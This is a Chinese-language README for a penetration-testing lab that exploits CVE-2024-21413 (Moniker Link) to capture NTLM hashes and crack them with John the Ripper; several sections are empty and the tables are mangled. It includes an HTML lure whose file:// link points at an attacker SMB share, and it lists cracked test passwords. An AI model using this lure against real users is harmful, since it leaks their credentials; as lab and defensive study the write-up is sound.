一个演示 CVE-2024-21413 Moniker Link 漏洞利用以窃取 NTLM 凭据的实操型渗透测试实验室。本项目记录了从环境搭建到凭据失陷的完整攻击链,并包含真实环境中的挑战与解决方案。
关键成果: 成功在隔离实验环境(Windows 10 虚拟机)和真实系统(Windows 11 PC)上执行了 Moniker Link 攻击,证明了实际存在的安全漏洞并验证了防御对策。
攻击机:
目标系统:
网络配置:
HTML 文件(test.html):
<!DOCTYPE html>
<html>
<body>
<p><a href="file://192.168.56.10/test">click me</a></p>
</body>
</html>
文件资源管理器方法:
\\192.168.56.101\test问题:
根本原因:
解决方案:
经验教训: 默认的 Windows 防火墙能有效防御此攻击。用户必须保持其启用。
问题:
nwigwecj112Honey(错误密码!)12Honey 来自之前的测试根本原因:
~/.john/john.pot解决方案:
1414经验教训: 始终确认你破解的是正确的哈希。清除 pot 文件或使用唯一的测试密码。
问题:
1414 未在 rockyou.txt(1400 万条密码)中找到根本原因:
解决方案:
echo "1414" > passwords.txt
echo "4141" >> passwords.txt
经验教训: “不在 rockyou.txt 中”≠ 安全。短密码无论是否在字典中,都容易受到定向攻击和暴力破解的影响。
✅ Windows 防火墙 - 启用时完全阻止了攻击 ✅ 现代浏览器 - Chrome/Edge 阻止远程 file:// 链接 ✅ 用户安全意识 - 手动提示要求用户操作
❌ 弱密码 - 4 位数字极易被破解 ❌ 禁用防火墙 - 用户的常见错误 ❌ 文件资源管理器 - 对 UNC 路径无警告 ❌ NTLM 协议 - 自动向 SMB 共享进行认证
1. 防火墙至关重要
2. 密码强度错觉
1414 不在 rockyou.txt 中(看似“强密码”)3. 需要用户交互
攻击工具:
基础设施:
Moniker-Link-Lab-Setup/
├── README.md (this file)
├── Documentation/
│ ├── attack-execution.md (step-by-step attack guide)
│ └── README.md (documentation overview)
├── Screenshots/ (attack screenshots - to be added)
└── Scripts/ (HTML test file - to be added)
技术技能:
职业技能:
所有测试均在授权系统上进行:
法律声明: 未经授权的计算机访问是非法的。本项目仅用于教育目的和授权测试环境。
LinkedIn: https://www.linkedin.com/in/chukwuemeka-nwigwe-624aa3292/ GitHub: @E-m-e-k-a
日期: 2026 年 3 月
仅限教育用途。不得用于未经授权的测试。
⭐ 如果你觉得这个项目有帮助,请考虑给该仓库点个星标!
| 指标 | 结果 |
|---|
| 初始密码 | nwigwecj1 |
| 更改为 | 1414 |
| 字典 | 自定义(2 条) |
| 破解时间 | <1 秒 |
| 防火墙 | 测试时已禁用 |
| 状态 | ✅ 成功被攻陷 |
| 指标 |
|---|
| 结果 |
|---|
| 密码 | 1414 |
| 防火墙 | 最初被阻止,随后禁用 |
| 认证 | 手动提示(输入了凭据) |
| 破解时间 | 即时 |
| 状态 | ✅ 成功被攻陷 |